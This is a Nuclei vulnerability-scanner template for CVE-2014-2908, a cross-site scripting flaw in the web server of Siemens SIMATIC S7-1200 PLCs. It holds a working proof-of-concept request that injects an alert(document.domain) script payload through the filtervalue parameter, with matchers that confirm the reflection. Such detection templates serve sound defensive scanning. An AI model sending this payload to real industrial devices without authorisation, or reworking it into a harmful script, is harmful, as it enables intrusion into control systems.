nuclei-templates/cves/2014/CVE-2014-2908.yaml

33 lines
982 B
YAML

id: CVE-2014-2908
info:
name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
reference:
- https://www.exploit-db.com/exploits/44687
- https://nvd.nist.gov/vuln/detail/CVE-2014-2908
tags: cve,cve2014,xss,siemens
requests:
- method: GET
path:
- '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200